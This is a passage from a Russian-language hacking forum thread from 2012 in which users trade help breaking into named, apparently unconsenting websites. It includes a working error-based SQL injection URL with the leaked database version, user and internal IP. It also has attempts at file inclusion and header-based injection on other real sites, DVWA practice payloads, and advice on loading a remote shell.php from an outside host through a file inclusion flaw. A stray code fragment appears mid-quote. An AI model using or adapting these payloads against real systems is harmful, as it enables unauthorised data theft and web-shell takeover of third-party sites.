ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

09.10.2012, 14:10
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме: 11937
Репутация:
0
|
|
Сообщение от Nikel3rN
Nikel3rN said:
Не могу раскрутить , хелп
http://www.l2db.ru/npc/index/2/rg/all/all/8/all/%5C%27
Дальше думаю сами сможете?
Код:
Code:
http://www.l2db[dot]ru/npc/index/2/rg/all/all/8/all/\'))+and+extractvalue(1,concat(0x3a,version()))+--+-
Version: 5.1.52-log
DB_user: l2db_ru@10.0.66.21
Current_db: l2dbtest
to BigBear, поправил, Вы ошибались!
|
|
|

09.10.2012, 17:20
|
|
Guest
Сообщений: n/a
Провел на форуме: 18452
Репутация:
0
|
|
Народ нужен хелп, LFI вроде есть, но не выводится ниче.
deabloz.com/modules/boonex/poll/index.php?aModule=
Пробую данный сплоит:
1337day.com/exploits/14663
|
|
|
|

10.10.2012, 11:52
|
|
Guest
Сообщений: n/a
Провел на форуме: 1793
Репутация:
-5
|
|
что то не получается раскрутить,может кто подсказать
http://www.turboklicker.de/index.php?content=/nickpage&id=2
|
|
|
|

10.10.2012, 15:13
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от wkuzy
wkuzy said:
что то не получается раскрутить,может кто подсказать
http://www.turboklicker.de/index.php?content=/nickpage&id=2
Указывайте, пожалуйста, параметры в которых вы подозреваете инъекцию. И способы, которые вы пробовали для их раскрутки.
|
|
|

12.10.2012, 01:31
|
|
Guest
Сообщений: n/a
Провел на форуме: 3933
Репутация:
0
|
|
Есть сайт, в при входе на него твой айпи просто проверяется в базе и если найден то Die, айпи проверяется по HTTP_X_FORWARDED_FOR, который можно заменить в хттп заголовке
Но если запрос успешен то он просто он ничего не выводит. Прав за напись нету.
Самая главная проблема вот в чем, фильтруется ',' и ';' и фильтруется таким образом, что было до нее обрезает впрочь. т.е:
x-forwarded-for: UNION SELECT ALL (SELECT, * FROM banned) -- AND users='"
А ответ MySQL ERROR 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '", 95.134.22.54'' at line 1
#0 mysql_exec(select * from banned where ip='* FROM banned) -- AND users='", Айпи тут был')
|
|
|
|

12.10.2012, 02:37
|
|
Guest
Сообщений: n/a
Провел на форуме: 1209
Репутация:
0
|
|
Спасибо.
Подскажите с SQL inj в DVWA level medium
http://localhost/dvwa/vulnerabilities/sqli/?id=1'+UnIoN+sElECT+1,2--+&Submit=Submit
выводит
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' UnIoN sElECT 1,2--' at line 1
'\' - с таким еще не сталкивался. в статьях вроде про обходы не пишут
upd. разобрался. успешно прошел запрос:
Сообщение от None
http://localhost/dvwa/vulnerabilities/sqli/?id=1%20and%201=1%20union%20select%20concat(versio n(),0x3a,user(),0x3a,database()),2&Submit=Submit
только не понимаю, как я это обошел, подскажите плиз.
upd2.
перешел на high. его реально пройти вообще? как выполнить xss?
|
|
|
|

12.10.2012, 07:07
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от None
Подскажите с SQL inj в DVWA level medium
http://localhost/dvwa/vulnerabilities/sqli/?id=1'+UnIoN+sElECT+1,2--+&Submit=Submit
выводит
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' UnIoN sElECT 1,2--' at line 1
'\' - с таким еще не сталкивался. в статьях вроде про обходы не пишут
" if author else f"
Подскажите с SQL inj в DVWA level medium
http://localhost/dvwa/vulnerabilities/sqli/?id=1'+UnIoN+sElECT+1,2--+&Submit=Submit
выводит
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' UnIoN sElECT 1,2--' at line 1
'\' - с таким еще не сталкивался. в статьях вроде про обходы не пишут
Почитай про Magic Quotes
А вот тут можно прочитать про отличия инъекций в строковом параметре от инъекций в числовом параметре
|
|
|

14.10.2012, 01:23
|
|
Guest
Сообщений: n/a
Провел на форуме: 2855
Репутация:
0
|
|
здравствуйте.
www.site1.ru/index.php?page=http://www.site2.ru срабатывает и подгружает site2 вместе с site1.везде тут в статьях написано ура супер круто мы получили веб шелл.но чета подробнее об этом не нашел. вопрос таков.что делать дальше)
я так понимаю теперь необходимо залить на some хостинг файлик shell.php и составить
запрос типа http://site1.ru/index.php?page=http://www.site2.ru/shell - без расширения на конце. это и будет наш шелл? я правильно все понимаю? если нет пните в правильную сторону)
|
|
|
|

14.10.2012, 01:34
|
|
Guest
Сообщений: n/a
Провел на форуме: 179355
Репутация:
53
|
|
Сообщение от mod_
mod_ said:
здравствуйте.
www.site1.ru/index.php?page=http://www.site2.ru срабатывает и подгружает site2 вместе с site1.везде тут в статьях написано ура супер круто мы получили веб шелл.но чета подробнее об этом не нашел. вопрос таков.что делать дальше)
я так понимаю теперь необходимо залить на some хостинг файлик shell.php и составить
запрос типа http://site1.ru/index.php?page=http://www.site2.ru/shell - без расширения на конце. это и будет наш шелл? я правильно все понимаю? если нет пните в правильную сторону)
php include
|
|
|
|

14.10.2012, 02:17
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
mod_
вероятнее там ссылка открывается в iframe а не инклуд и тп, разберись, попробуй подключить php файлы
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|